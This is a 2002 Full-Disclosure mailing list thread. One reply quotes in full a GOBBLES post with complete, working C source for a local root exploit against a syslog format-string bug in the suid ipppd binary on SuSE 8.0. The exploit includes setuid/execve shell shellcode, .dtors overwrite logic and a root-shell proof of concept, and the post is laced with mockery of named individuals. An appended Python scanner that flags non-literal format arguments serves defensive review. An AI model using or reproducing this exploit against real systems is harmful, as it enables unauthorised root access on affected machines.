Full Disclosure mailing list archives
Local Root Exploit
From: full-disclosure () lists netsys com (ATD)
Date: 10 Aug 2002 02:17:02 -0400
Gobbles,

Tell me, is it common practice for "security professionals" to act like children? Or, is it common practice to commit slander? I think the majority of the people on these lists would like to see the lists used for security research and information disclosure. I do not think that the true professionals want to be bothered with childish ranting and raving.

Anyway, I am sure your research is appreciated, good job on the find.

Sincerely,
ATD

On Fri, 2002-08-09 at 18:54, gobbles () hushmail com wrote:
/*
 * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
 *
 * Random Defcon Quote:
 * "Who hired Gary Coleman to play KF at defcon?"
 * -Anonymous
 *
 * ipppd is part of the isdn4linux-utils package and
 * is part of the default install of many linux dists.
 *
 * It is installed suid root on suse 8.0 but can only
 * be run by users in group "dialout". Luckily this
 * is a default group that normal users get added to.
 *
 * Problem:
 *
 * Classical syslog(3) formatstring problem.
 *
 * ipppd will log device strings in the following manner:
 *
 * main.c:
 *
 * ...
 * syslog(LOG_NOTICE,devstr); // HARD TO SPOT BUG
 * ...
 *
 * This code is normally only reached with a valid device string
 * but if you feed ipppd a devicename that is >= 256 bytes it
 * will merrily proceed to log this string using the faulty
 * syslog(3) call. Subsequently handing over root access to the machine.
 *
 * GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
 *
 * We're surprised that format bugs are allowed in 7350linux, but no one
 * is perfect. Finding format bugs is a difficult task, and should be left
 * to the professionals. A little known fact -- Paul Vixie invented
 * insecure programming. We wanted to get this bug squashed before some
 * "researcher" from snosoft.com discovered it and tried to make some money
 * off it. Help us in our mission to eliminate the existence of format bugs
 * in code.
 *
 * Greets:
 * -Mark Litchfield, for helping make defcon happen. Thanks.
 * -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
 * Challenge (the finest moment of defcon X)
 * -Dean Turner, who contrary to whatever might be said, GOBBLES is not
 * afraid of. http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
 * -Eric Hines of f8labs.com, congratulations on your promotion to stockboy
 * at Circuit City.
 * -dice, for continuing to support the blackhat world (thanks for buying
 * a turkey breakfast)
 * -stealth, for making fun of the super bug.
 * -Brian McWilliams, for thinking he knows what's up. Hoser.
 *
 * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
 * have compromised each and every one of those machines, and are rapidly
 * stealing other warez developed on these machines. If you have also
 * worked with your perl -e techniques on these machines, and discovered some
 * locally exploitable stack overflows, your work may have been ripped off.
 * KF, the defcon stage, much like information security, is not for you.
 *
 * Please, help liberate dvdman! Let him go back to maintaining
 * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
 * skill displayed on l33tsecurity.com shows this man knows what's up and
 * deserves to make a little more money, or return to the wild where he
 * can hack freely. FREE DVDMAN!@#!@#
 *
 * (flashn has asked that the "hack.se is a bunch of nazis" statement from
 * the defcon speech to be publicly retracted and for an apology to be
 * issued)
 *
 */

/*
 * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
 *
 * $ ./GOBBLES-own-ipppd -t 0x806c864
 * [*] target @ 0x806c868
 * [*] shellcode @ 0xbfffffb5
 * sh-2.05# id
 * uid=0(root) gid=100(users) groups=100(users)
 * sh-2.05#
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define DPA 11
#define ALLIGN 3

#define IPPPD "/usr/sbin/ipppd"
#define OBJDUMP "/usr/bin/objdump"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[260];

int main(int argc, char **argv)
{
    int dpa, aln, shift = 0;
    char opt, *tmp;
    unsigned long t, w;

    if(argc == 1) {
        fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
            "Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
            "For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
            , argv[0]);
        exit(0);
    }

    aln = ALLIGN;
    dpa = DPA;

    while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
        switch(opt) {
            case 't':
                sscanf(optarg, "%p", &tmp);
                t = (long)tmp;
                t += 4;
                break;
            case 'a':
                aln = atoi(optarg);
                break;
            case 'o':
                dpa = atoi(optarg);
                break;
            case 'g':
                fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
                if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
                    fprintf(stderr, "[*] error getting .dtors section, check paths\n");
                    exit(1);
                }
            default:
                fprintf(stderr, "hehehe ;PppPPPpP\n");
                exit(0);
        }
    }

    tmp = NULL;

    if((tmp = getenv("GOBBLES")) == NULL) {
        stuff();
        if(execve(argv[0], argv, environ)) {
            fprintf(stderr, "[*] error re-executing\n");
            exit(1);
        }
    }

    w = (long)tmp;
    shift = (strlen(argv[0]) - strlen(IPPPD));
    w += shift;

    fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);

    buildstring(t, w, dpa, aln);

    if(execl(IPPPD, "ipppd", string, NULL)) {
        fprintf(stderr, "[*] error executing\n");
        exit(1);
    }
}


void buildstring(unsigned long t, unsigned long w, int dpa, int aln)
{
    char a_buf[4];
    unsigned int un, deux, x, len, b[4];

    memset(string, '\0', sizeof(string));
    memset(a_buf, '\0', sizeof(a_buf));

    for(x = 0; x < aln && x < sizeof(a_buf); x++)
        a_buf[x] = 'x';

    b[0] = (t & 0x000000ff);
    b[1] = (t & 0x0000ff00) >> 8;
    b[2] = (t & 0x00ff0000) >> 16;
    b[3] = (t & 0xff000000) >> 24;

    un = (w >> 16) & 0xffff;
    deux = w & 0xffff;

    if(un < deux) {
        snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"
            "%%.%hdx"
            "%%%d$hn"
            "%%.%hdx"
            "%%%d$hn",
            a_buf,
            b[0] + 2, b[1], b[2], b[3],
            b[0], b[1], b[2], b[3],
            un - (8 + aln + 5), dpa,
            deux - un, dpa + 1
        );
    } else {
        snprintf(string, sizeof(string)-1,
            "%s"
            "%c%c%c%c%c%c%c%c"
            "%%.%hdx"
            "%%%d$hn"
            "%%.%hdx"
            "%%%d$hn",
            a_buf,
            b[0], b[1], b[2], b[3],
            b[0]+2, b[1], b[2], b[3],
            deux - (8 + aln + 5), dpa,
            un - deux, dpa + 1
        );
    }

    len = strlen(string);
    memset(&string[len], 'x', (sizeof(string)-len-1));
}


void stuff(void)
{
    char code[] =                       // the setuid 0 with the execve of the /bin/sh
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";     // In honor of Snosoft
                                                // appreciate week, we
                                                // too are using only
                                                // Taeho Oh shellcode.

    setenv("GOBBLES", code, 1);
}

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure
--
-ATD-
That file you've been guarding, isn't.
-------------------------------------------------------------------
Secure Network Operations, Inc | http://www.snosoft.com
Cerebrum Project | cerebrum () snosoft com
Strategic Reconaissance Team | recon () snosoft com
-------------------------------------------------------------------
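The bug GOBBLES points at, a syslog(3) call whose format argument is a variable rather than a string literal, is exactly the pattern a code reviewer can grep for. The scanner below is added here for illustration and is not part of either post or of ipppd; the sink table, the argument-index assumptions and the sample C lines are constructed.

```python
import re

# printf-style sinks -> 0-based index of the format argument (constructed; add project wrappers).
FORMAT_SINKS = {"printf": 0, "vprintf": 0, "syslog": 1, "vsyslog": 1, "fprintf": 1,
                "vfprintf": 1, "sprintf": 1, "snprintf": 2, "vsnprintf": 2}
_CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_SINKS) + r")\s*\(")
_LITERAL_FMT = re.compile(r'(\s*"(?:[^"\\]|\\.)*"\s*)+')   # adjacent C string literals only

def _extract_args(text, start):
    """Top-level argument texts of the call whose '(' is at text[start]."""
    depth, in_str, buf, args, i = 0, False, "", [], start
    while i < len(text):
        ch = text[i]
        if in_str:                        # copy literals verbatim, honouring escapes
            if ch == "\\" and i + 1 < len(text):
                buf, i = buf + ch + text[i + 1], i + 1
            else:
                buf, in_str = buf + ch, ch != '"'
        elif ch == "(" and depth == 0:
            depth = 1                     # opening paren of the call itself
        elif ch == ")" and depth == 1:
            args.append(buf.strip())
            return args
        elif ch == "," and depth == 1:
            args, buf = args + [buf.strip()], ""
        else:
            depth += (ch == "(") - (ch == ")")   # nested calls such as sizeof(buf)
            in_str = ch == '"'
            buf += ch
        i += 1
    return args                           # unterminated call: return what was seen

def find_nonliteral_formats(source):
    """(line_no, sink, format_expr) for each sink call whose format argument is not a literal."""
    findings = []
    for m in _CALL_RE.finditer(source):
        args = _extract_args(source, m.end() - 1)
        idx = FORMAT_SINKS[m.group(1)]
        if idx < len(args) and not _LITERAL_FMT.fullmatch(args[idx]):
            findings.append((source.count("\n", 0, m.start()) + 1, m.group(1), args[idx]))
    return findings

# Constructed sample source: the bug from the post next to its fixed form.
SAMPLE_C = '''\
    syslog(LOG_NOTICE,devstr);               /* HARD TO SPOT BUG */
    syslog(LOG_NOTICE, "%s", devstr);        /* fixed form */
    snprintf(buf, sizeof(buf) - 1, fmt, argv[1]);
'''
for line_no, sink, fmt in find_nonliteral_formats(SAMPLE_C):   # reports lines 1 and 3
    print(f"line {line_no}: {sink}() called with non-literal format {fmt!r}")
```

The scanner flags any non-literal format expression, so a format built from a constant table will also be reported and needs manual review; that is the intended trade-off for a grep-level check.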
Current thread:
- Local Root Exploit full-disclosure () lists netsys com (Aug 09)
- Local Root Exploit ATD (Aug 09)
- Local Root Exploit John (Aug 09)
- Local Root Exploit Lupe Christoph (Aug 10)
- Local Root Exploit KF (Aug 10)
- Local Root Exploit Steve (Aug 12)
- Local Root Exploit John (Aug 09)
- Local Root Exploit ATD (Aug 09)
- Local Root Exploit Roman Drahtmueller (Aug 10)
- <Possible follow-ups>
- Local Root Exploit Schmehl, Paul L (Aug 10)
- Local Root Exploit Alan Rouse (Aug 12)
- Local Root Exploit Ulf Härnhammar (Aug 13)
- Local Root Exploit Alan Rouse (Aug 14)
- Local Root Exploit Nicolas Couture (Aug 14)